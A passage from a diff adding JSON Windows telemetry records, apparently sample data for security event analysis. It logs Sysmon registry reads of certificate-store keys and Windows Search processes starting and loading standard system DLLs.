"registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\SearchProtocolHost.exe\" Global\\UsGthrFltPipeMssGthrPipe16_ Global\\UsGthrCtrlFltPipeMssGthrPipe16 1 -2147483646 \"Software\\Microsoft\\Windows Search\" \"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\" \"C:\\ProgramData\\Microsoft\\Search\\Data\\Temp\\usgthrsvc\" \"DownLevelDaemon\" ", + "event_type": "process", + "logon_id": 999, + "parent_process_name": "SearchIndexer.exe", + "parent_process_path": "C:\\Windows\\System32\\SearchIndexer.exe", + "pid": 3560, + "ppid": 5824, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", + "subtype": "create", + "timestamp": 131883570915600000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}", + "unique_ppid": "{42FC7E13-B303-5C05-0000-0010823E0600}", + "user": "NT AUTHORITY\\SYSTEM", + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", + "timestamp": 131883570915590000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570915590000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570915590000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", + "timestamp": 131883570915590000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", + "timestamp": 131883570915590000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", + "timestamp": 131883570915590000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "image_load", + "image_name": "oleaut32.dll", + "image_path": "C:\\Windows\\System32\\oleaut32.dll", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", + "timestamp": 131883570915590000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "image_load", + "image_name": "msvcp_win.dll", + "image_path": "C:\\Windows\\System32\\msvcp_win.dll", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", + "timestamp": 131883570915590000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\System32\\ucrtbase.dll", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", + "timestamp": 131883570915590000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "image_load", + "image_name": "combase.dll", + "image_path": "C:\\Windows\\System32\\combase.dll", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", + "timestamp": 131883570915590000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", + "timestamp": 131883570915590000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "image_load", + "image_name": "bcryptprimitives.dll", + "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", + "timestamp": 131883570915590000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", + "timestamp": 131883570915590000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", + "timestamp": 131883570915590000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "image_load", + "image_name": "windows.storage.dll", + "image_path": "C:\\Windows\\System32\\windows.storage.dll", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", + "timestamp": 131883570915590000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "image_load", + "image_name": "shlwapi.dll", + "image_path": "C:\\Windows\\System32\\shlwapi.dll", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", + "timestamp": 131883570915740000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "image_load", + "image_name": "gdi32.dll", + "image_path": "C:\\Windows\\System32\\gdi32.dll", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", + "timestamp": 131883570915740000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "image_load", + "image_name": "gdi32full.dll", + "image_path": "C:\\Windows\\System32\\gdi32full.dll", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", + "timestamp": 131883570915740000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "image_load", + "image_name": "user32.dll", + "image_path": "C:\\Windows\\System32\\user32.dll", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", + "timestamp": 131883570915740000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "image_load", + "image_name": "win32u.dll", + "image_path": "C:\\Windows\\System32\\win32u.dll", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", + "timestamp": 131883570915740000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "image_load", + "image_name": "kernel.appcore.dll", + "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", + "timestamp": 131883570915740000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "image_load", + "image_name": "SHCore.dll", + "image_path": "C:\\Windows\\System32\\SHCore.dll", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", + "timestamp": 131883570915740000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "image_load", + "image_name": "profapi.dll", + "image_path": "C:\\Windows\\System32\\profapi.dll", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", + "timestamp": 131883570915740000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "image_load", + "image_name": "powrprof.dll", + "image_path": "C:\\Windows\\System32\\powrprof.dll", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", + "timestamp": 131883570915740000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "image_load", + "image_name": "fltLib.dll", + "image_path": "C:\\Windows\\System32\\fltLib.dll", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", + "timestamp": 131883570915740000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "image_load", + "image_name": "SearchProtocolHost.exe", + "image_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", + "timestamp": 131883570915590000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570915740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570915740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570915740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570915740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570915740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570915740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570915740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570915740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570915740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570915740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570915740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570915740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570915740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570915740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570915740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570915740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570915740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570915740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570915740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570915740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570915740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570915740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570915740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570915740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "imm32.dll", + "image_path": "C:\\Windows\\System32\\imm32.dll", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", + "timestamp": 131883570916060016, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570916060016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570916060016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "clbcatq.dll", + "image_path": "C:\\Windows\\System32\\clbcatq.dll", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", + "timestamp": 131883570916060016, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "registry", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\WINDOWS\\system32\\SearchProtocolHost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883570916060016, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\SearchFilterHost.exe\" 0 744 748 756 8192 752 ", + "event_type": "process", + "logon_id": 999, + "parent_process_name": "SearchIndexer.exe", + "parent_process_path": "C:\\Windows\\System32\\SearchIndexer.exe", + "pid": 6608, + "ppid": 5824, + "process_name": "SearchFilterHost.exe", + "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", + "subtype": "create", + "timestamp": 131883570916229984, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}", + "unique_ppid": "{42FC7E13-B303-5C05-0000-0010823E0600}", + "user": "NT AUTHORITY\\SYSTEM", + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "event_type": "image_load", + "image_name": "ole32.dll", + "image_path": "C:\\Windows\\System32\\ole32.dll", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", + "timestamp": 131883570916210000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6608, + "process_name": "SearchFilterHost.exe", + "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", + "timestamp": 131883570916210000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6608, + "process_name": "SearchFilterHost.exe", + "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", + "timestamp": 131883570916210000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6608, + "process_name": "SearchFilterHost.exe", + "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", + "timestamp": 131883570916210000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6608, + "process_name": "SearchFilterHost.exe", + "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", + "timestamp": 131883570916210000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" + }, + { + "event_type": "image_load", + "image_name": "oleaut32.dll", + "image_path": "C:\\Windows\\System32\\oleaut32.dll", + "pid": 6608, + "process_name": "SearchFilterHost.exe", + "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", + "timestamp": 131883570916210000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" + }, + { + "event_type": "image_load", + "image_name": "msvcp_win.dll", + "image_path": "C:\\Windows\\System32\\msvcp_win.dll", + "pid": 6608, + "process_name": "SearchFilterHost.exe", + "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", + "timestamp": 131883570916210000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\System32\\ucrtbase.dll", + "pid": 6608, + "process_name": "SearchFilterHost.exe", + "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", + "timestamp": 131883570916210000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" + }, + { + "event_type": "image_load", + "image_name": "combase.dll", + "image_path": "C:\\Windows\\System32\\combase.dll", + "pid": 6608, + "process_name": "SearchFilterHost.exe", + "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", + "timestamp": 131883570916210000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": 